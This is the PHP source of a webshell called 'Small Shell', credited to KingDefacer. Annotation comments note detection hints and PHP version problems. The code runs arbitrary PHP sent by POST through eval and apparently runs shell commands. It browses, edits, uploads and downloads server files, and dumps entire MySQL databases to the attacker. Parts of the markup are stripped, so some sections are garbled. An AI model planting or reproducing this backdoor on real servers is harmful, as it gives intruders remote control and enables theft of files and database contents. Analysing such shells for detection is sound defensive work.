small.php webshell


php webshell

 alturks.com#
# Just for fun :)#
##########################################################
// Report every notice/warning into the response and lift the execution-time
// cap (0 = unlimited) so long requests are not killed by max_execution_time.
// The '@' only hides the warning set_time_limit() emits when safe_mode or a
// hosting restriction refuses the change.
error_reporting( E_ALL );
@set_time_limit( 0 );
// Undo the backslash escaping that the magic_quotes_gpc ini setting applied to
// request data, returning the raw value of $s.  Only runs when
// get_magic_quotes_gpc() reports the setting as on; otherwise $s is returned as is.
// Roughly stripslashes(): one leading backslash is removed in front of ', \ and ".
// The last replace maps the three-character sequence \\0 to \0 rather than
// restoring a NUL byte, so it is not a faithful inverse of magic quotes for NULs.
// NOTE(review): get_magic_quotes_gpc() always returns false on PHP 7.4 and was
// removed in PHP 8.0, where calling it is a fatal error.
function magic_q( $s ) {
	if ( get_magic_quotes_gpc() ) {
		$s = str_replace( '\\\'', '\'', $s );
		$s = str_replace( '\\\\', '\\', $s );
		$s = str_replace( '\\"', '"', $s );
		$s = str_replace( '\\\0', '\0', $s );
	}

	return $s;
}

// Render the permission bits of path $fn as a nine-character "rwxrwxrwx" string
// (owner, group, other), in the style of `ls -l` but without the leading file
// type and without setuid/setgid/sticky bits.
// Each octal mask below isolates one bit of the mode returned by fileperms().
// If fileperms() fails it returns false, which masks to 0, so a missing file
// yields "---------" rather than an error (callers in this script also wrap the
// call in '@').
function get_perms( $fn ) {
	$mode= fileperms( $fn );
	$perms = '';
	// owner bits: 0400 read, 0200 write, 0100 execute
	$perms .= ( $mode & 00400 ) ? 'r' : '-';
	$perms .= ( $mode & 00200 ) ? 'w' : '-';
	$perms .= ( $mode & 00100 ) ? 'x' : '-';
	// group bits: 0040 read, 0020 write, 0010 execute
	$perms .= ( $mode & 00040 ) ? 'r' : '-';
	$perms .= ( $mode & 00020 ) ? 'w' : '-';
	$perms .= ( $mode & 00010 ) ? 'x' : '-';
	// other bits: 0004 read, 0002 write, 0001 execute
	$perms .= ( $mode & 00004 ) ? 'r' : '-';
	$perms .= ( $mode & 00002 ) ? 'w' : '-';
	$perms .= ( $mode & 00001 ) ? 'x' : '-';

	return $perms;
}

$head= <<

Small Shell - Edited By KingDefacer




headka;
// Mode selection: POST 'page' takes priority, otherwise the raw query string
// (so a request like ?mysql or ?eval picks the mode).  Anything other than the
// three known modes falls back to 'cmd'.  Useful for log-based detection: the
// mode name appears verbatim as the query string or the POST 'page' field.
$page= isset( $_POST['page'] ) ? $_POST['page'] : ( isset( $_SERVER['QUERY_STRING'] ) ? $_SERVER['QUERY_STRING'] : '' );
$page= $page == '' || ( $page != 'cmd' && $page != 'mysql' && $page != 'eval' ) ? 'cmd' : $page;
// Crude OS check: strpos() offset when php_uname() contains "wind", false
// otherwise.  Later code compares with === false to take the Unix path.
$winda = strpos( strtolower( php_uname() ), 'wind' );
// Column width of the directory listing; longer names are truncated with '...'.
define( 'format', 50 );
$pages = '
###cmd###mysql###eval###
' . ( $winda === false ? 'id :' . `id` : '' ); switch ( $page ) { case 'eval': { $eval_value = isset( $_POST['eval_value'] ) ? $_POST['eval_value'] : ''; $eval_value = magic_q( $eval_value ); $action = isset( $_POST['action'] ) ? $_POST['action'] : 'eval'; if ( $action == 'eval_in_html' ) { @eval( $eval_value ); } else { echo( $head . $pages ); ?>

'>

without arch gzip archive
' . htmlspecialchars( $cmd ) . "
\n" ); } else { $f_action = isset( $_POST['f_action'] ) ? $_POST['f_action'] : 'view'; if ( @is_dir( $work_dir ) ) { echo( 'Listing ' . $e_work_dir . '
' ); $handle = @opendir( $work_dir ); if ( $handle ) { while ( false !== ( $fn = readdir( $handle ) ) ) { $files[] = $fn; }; @closedir( $handle ); sort( $files ); $not_dirs = array(); for ( $i = 0; $i < sizeof( $files ); $i ++ ) { $fn = $files[ $i ]; if ( is_dir( $fn ) ) { echo( '' . htmlspecialchars( strlen( $fn ) > format ? substr( $fn, 0, format - 3 ) . '...' : $fn ) . '' . str_repeat( ' ', format - strlen( $fn ) ) ); if ( $winda === false ) { $owner = @posix_getpwuid( @fileowner( $work_dir . $fn ) ); $group = @posix_getgrgid( @filegroup( $work_dir . $fn ) ); printf( "% 20s|% -20s", $owner['name'], $group['name'] ); } echo( @get_perms( $work_dir . $fn ) . str_repeat( ' ', 10 ) ); printf( "% 20s ", @filesize( $work_dir . $fn ) . 'B' ); printf( "% -20s", @date( 'M d Y H:i:s', @filemtime( $work_dir . $fn ) ) . "\n" ); } else { $not_dirs[] = $fn; } } for ( $i = 0; $i < sizeof( $not_dirs ); $i ++ ) { $fn = $not_dirs[ $i ]; echo( '' . htmlspecialchars( strlen( $fn ) > format ? substr( $fn, 0, format - 3 ) . '...' : $fn ) . '' . str_repeat( ' ', format - strlen( $fn ) ) ); if ( $winda === false ) { $owner = @posix_getpwuid( @fileowner( $work_dir . $fn ) ); $group = @posix_getgrgid( @filegroup( $work_dir . $fn ) ); printf( "% 20s|% -20s", $owner['name'], $group['name'] ); } echo( @get_perms( $work_dir . $fn ) . str_repeat( ' ', 10 ) ); printf( "% 20s ", @filesize( $work_dir . $fn ) . 'B' ); printf( "% -20s", @date( 'M d Y H:i:s', @filemtime( $work_dir . $fn ) ) . "\n" ); } echo( '
' );//此处prre请手动换成pre ?>

' . $e_work_dir . " Edit
\n" );
				$f = @fopen( $work_dir, 'r' );
				?>
				
Error ' . $e_work_dir . "
\n" );
				} else {
					fwrite( $f, $file_text );
					fclose( $f );
					echo( '' . $e_work_dir . " is saving
\n" );
				}
				break;
			}
		}
	break;
}
break;
}
// Store a multipart upload (form field "filename") under its client-supplied
// name inside $work_dir.  $work_dir and $e_work_dir are set earlier in the
// script, outside this block; $e_work_dir is presumably the HTML-escaped
// form — confirm against the code above.
case 'upload' : {
	// Normalise the target directory to end in a path separator.
	// NOTE(review): the $str{index} offset syntax used here was deprecated in
	// PHP 7.4 and removed in PHP 8.0, so this case cannot run on PHP 8.
	if ( $work_dir == '' ) {
		$work_dir = '/';
	} else if ( ! ( $work_dir{strlen( $work_dir ) - 1} == '/' || $work_dir{strlen( $work_dir ) - 1} == '\\' ) ) {
		$work_dir .= '/';
	}
	// The original file name is used as-is; the resulting file keeps that name
	// on disk, which is what a file-integrity monitor or web-root scan would see.
	$f = $_FILES["filename"]["name"];
	if ( ! @copy( $_FILES["filename"]["tmp_name"], $work_dir . $f ) ) {
		echo( 'Upload is failed' );
	} else {
		echo( 'file is uploaded in ' . $e_work_dir );
	}
	break;
}
// Send the file named by POST 'fname' back to the client, either gzip-compressed
// in one piece or as a raw octet-stream in 10000-byte chunks.
case 'download' : {
	$fname = isset( $_POST['fname'] ) ? $_POST['fname'] : '';
	// Read from the form but not referenced anywhere in this block.
	$temp_file = isset( $_POST['temp_file'] ) ? 'on' : 'nn';
	$f = @fopen( $fname, 'r' );
	if ( ! ( $f ) ) {
		echo( 'file is not exists' );
	} else {
		$archive = isset( $_POST['archive'] ) ? $_POST['archive'] : '';
		// NOTE(review): every Header() call below embeds "\n" or "\n\n" in the
		// header value; since PHP 5.1.2 header() refuses values containing a
		// newline, so these are likely to fail on any non-ancient PHP — confirm
		// on the target version before relying on this path in analysis.
		if ( $archive == 'gzip' ) {
			// Whole file is read into memory, compressed, then emitted with an
			// exact Content-Length.
			Header( "Content-Type:application/x-gzip\n" );
			$s = gzencode( fread( $f, filesize( $fname ) ) );
			Header( 'Content-Length: ' . strlen( $s ) . "\n" );
			// Slashes in the path are replaced by '-' so the attachment name
			// still reflects the full server path that was fetched.
			Header( 'Content-Disposition: attachment; filename="' . str_replace( '/', '-', $fname ) . ".gz\n\n" );
			echo( $s );
		} else {
			Header( "Content-Type:application/octet-stream\n" );
			Header( 'Content-Length: ' . filesize( $fname ) . "\n" );
			Header( 'Content-Disposition: attachment; filename="' . str_replace( '/', '-', $fname ) . "\n\n" );
			// Streamed in fixed-size chunks, flushing the output buffer per chunk.
			ob_start();
			while ( feof( $f ) === false ) {
				echo( fread( $f, 10000 ) );
				ob_flush();
			}
		}
	}
	// $f is never fclose()d on either branch; the handle lives until request end.
}
}
break;
}
case 'mysql' : {
	$action = isset( $_POST['action'] ) ? $_POST['action'] : 'query';
	$user = isset( $_POST['user'] ) ? $_POST['user'] : '';
	$passwd = isset( $_POST['passwd'] ) ? $_POST['passwd'] : '';
	$db = isset( $_POST['db'] ) ? $_POST['db'] : '';
	$host = isset( $_POST['host'] ) ? $_POST['host'] : 'localhost';
	$query= isset( $_POST['query'] ) ? magic_q( $_POST['query'] ) : '';
	switch ( $action ) {
		// Dump one table or a whole database as SQL text.  Output goes either to
		// the HTTP response (optionally gzip-compressed) or, when 'to_file' is
		// given and no compression is requested, to a file on the server.
		// NOTE(review): the mysql_* extension used throughout was removed in
		// PHP 7.0, so this branch can only execute on a PHP 5.x host.
		case 'dump' : {
			$mysql_link = @mysql_connect( $host, $user, $passwd );
			if ( ! ( $mysql_link ) ) {
				echo( 'Connect error' );
			} else {
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
				// Optional server-side destination path; an empty string counts as unset.
				$to_file = isset( $_POST['to_file'] ) ? ( $_POST['to_file'] == '' ? false : $_POST['to_file'] ) : false;
				$archive = isset( $_POST['archive'] ) ? $_POST['archive'] : 'none';
				// Compression buffers the whole dump in memory and is never
				// combined with a file target.
				if ( $archive !== 'none' ) {
					$to_file = false;
				}
				$db_dump= isset( $_POST['db_dump'] ) ? $_POST['db_dump'] : '';
				$table_dump = isset( $_POST['table_dump'] ) ? $_POST['table_dump'] : '';
				if ( ! ( @mysql_select_db( $db_dump, $mysql_link ) ) ) {
					echo( 'DB error' );
				} else {
					// Every dump starts with this fixed banner, which makes .sql
					// files produced by this tool easy to recognise during triage.
					// Note it interpolates $db (the 'db' form field), not $db_dump.
					$dump_file = "#ZaCo MySQL Dumper\n#db $db from $host\n";
					ob_start();
					if ( $to_file ) {
						$t_f = @fopen( $to_file, 'w' );
						if ( ! $t_f ) {
							die( 'Cant opening ' . $to_file );
						}
					} else {
						$t_f = false;
					}
					if ( $table_dump == '' ) {
						// Whole-database dump: one CREATE TABLE plus INSERTs per
						// table listed by SHOW TABLES.
						if ( ! $to_file ) {
							header( 'Content-Type: application/x-' . ( $archive == 'none' ? 'octet-stream' : 'gzip' ) . "\n" );
							header( "Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql" . ( $archive == 'none' ? '' : '.gz' ) . "\"\n\n" );
						}
						$result = mysql_query( 'show tables', $mysql_link );
						for ( $i = 0; $i < mysql_num_rows( $result ); $i ++ ) {
							$rows= mysql_fetch_array( $result );
							$result2 = @mysql_query( 'show columns from `' . $rows[0] . '`', $mysql_link );
							if ( ! $result2 ) {
								$dump_file .= '#error table ' . $rows[0];
							} else {
								// CREATE TABLE is rebuilt from SHOW COLUMNS rows
								// ([0]=Field, [1]=Type, [2]=Null, [4]=Default); keys,
								// indexes and engine options are not reproduced.
								$dump_file .= 'create table `' . $rows[0] . "`(\n";
								// All columns but the last get a trailing comma.
								for ( $j = 0; $j < mysql_num_rows( $result2 ) - 1; $j ++ ) {
									$rows2 = mysql_fetch_array( $result2 );
									$dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ( $rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL' ) . ",\n";
								}
								$rows2 = mysql_fetch_array( $result2 );
								$dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ( $rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL' ) . "\n";
								// $type is filled here but never read in this block.
								$type[ $j ] = $rows2[1];
								$dump_file .= ");\n";
								mysql_free_result( $result2 );
								$result2 = mysql_query( 'select * from `' . $rows[0] . '`', $mysql_link );
								$columns = $j - 1;
								for ( $j = 0; $j < mysql_num_rows( $result2 ); $j ++ ) {
									$rows2 = mysql_fetch_array( $result2 );
									$dump_file .= 'insert into `' . $rows[0] . '` values (';
									// Values are quoted via addslashes(); NULL or '' becomes null.
									for ( $k = 0; $k < $columns; $k ++ ) {
										$dump_file .= $rows2[ $k ] == '' ? 'null,' : '\'' . addslashes( $rows2[ $k ] ) . '\',';
									}
									$dump_file .= ( $rows2[ $k ] == '' ? 'null);' : '\'' . addslashes( $rows2[ $k ] ) . '\');' ) . "\n";
									// Uncompressed output is flushed per row so large
									// tables stream instead of accumulating in memory.
									if ( $archive == 'none' ) {
										if ( $to_file ) {
											fwrite( $t_f, $dump_file );
											fflush( $t_f );
										} else {
											echo( $dump_file );
											ob_flush();
										}
										$dump_file = '';
									}
								}
								mysql_free_result( $result2 );
							}
						}
						mysql_free_result( $result );
						if ( $archive != 'none' ) {
							$dump_file = gzencode( $dump_file );
							header( 'Content-Length: ' . strlen( $dump_file ) . "\n" );
							echo( $dump_file );
						} else if ( $t_f ) {
							fclose( $t_f );
							echo( 'Dump for ' . $db_dump . ' now in ' . $to_file );
						}
					} else {
						// Single-table dump; same layout as the loop body above.
						$result2 = @mysql_query( 'show columns from `' . $table_dump . '`', $mysql_link );
						if ( ! $result2 ) {
							echo( 'error table ' . $table_dump );
						} else {
							// Both of the following blocks fire when no file target
							// is set ($to_file is false in that case), so the
							// Content-Type/Disposition headers are sent twice; the
							// second pair names the table in the attachment.
							if ( ! $to_file ) {
								header( 'Content-Type: application/x-' . ( $archive == 'none' ? 'octet-stream' : 'gzip' ) . "\n" );
								header( "Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql" . ( $archive == 'none' ? '' : '.gz' ) . "\"\n\n" );
							}
							if ( $to_file === false ) {
								header( 'Content-Type: application/x-' . ( $archive == 'none' ? 'octet-stream' : 'gzip' ) . "\n" );
								header( "Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql" . ( $archive == 'none' ? '' : '.gz' ) . "\"\n\n" );
							}
							$dump_file .= "create table `{$table_dump}`(\n";
							for ( $j = 0; $j < mysql_num_rows( $result2 ) - 1; $j ++ ) {
								$rows2 = mysql_fetch_array( $result2 );
								$dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ( $rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL' ) . ",\n";
							}
							$rows2 = mysql_fetch_array( $result2 );
							$dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ( $rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL' ) . "\n";
							// $type is filled here but never read in this block.
							$type[ $j ] = $rows2[1];
							$dump_file .= ");\n";
							mysql_free_result( $result2 );
							$result2 = mysql_query( 'select * from `' . $table_dump . '`', $mysql_link );
							$columns = $j - 1;
							for ( $j = 0; $j < mysql_num_rows( $result2 ); $j ++ ) {
								$rows2 = mysql_fetch_array( $result2 );
								$dump_file .= 'insert into `' . $table_dump . '` values (';
								for ( $k = 0; $k < $columns; $k ++ ) {
									$dump_file .= $rows2[ $k ] == '' ? 'null,' : '\'' . addslashes( $rows2[ $k ] ) . '\',';
								}
								$dump_file .= ( $rows2[ $k ] == '' ? 'null);' : '\'' . addslashes( $rows2[ $k ] ) . '\');' ) . "\n";
								if ( $archive == 'none' ) {
									if ( $to_file ) {
										fwrite( $t_f, $dump_file );
										fflush( $t_f );
									} else {
										echo( $dump_file );
										ob_flush();
									}
									$dump_file = '';
								}
							}
							mysql_free_result( $result2 );
							if ( $archive != 'none' ) {
								$dump_file = gzencode( $dump_file );
								header( 'Content-Length: ' . strlen( $dump_file ) . "\n" );
								echo $dump_file;
							} else if ( $t_f ) {
								fclose( $t_f );
								echo( 'Dump for ' . $db_dump . ' now in ' . $to_file );
							}
						}
					}
				}
			}
			break;
		}
		case 'query' : {
			echo( $head . $pages );
			?>
			
User : Passwd : Host : DB :
without arch gzip archive
DB :
Only Table :
Save result to :

\n" ); for ( $i = 0; $i < mysql_num_fields( $result ); $i ++ ) { echo( '' . htmlspecialchars( mysql_field_name( $result, $i ) ) . '' ); } echo( "\n\n" ); for ( $i = 0; $i < mysql_num_rows( $result ); $i ++ ) { $rows = mysql_fetch_array( $result ); echo( '' ); for ( $j = 0; $j < mysql_num_fields( $result ); $j ++ ) { echo( '' . ( htmlspecialchars( $rows[ $j ] ) ) . '' ); } echo( "\n" ); } echo( "\n" ); } mysql_close( $mysql_link ); } break; } } break; } } ?>

Edited By KingDefacer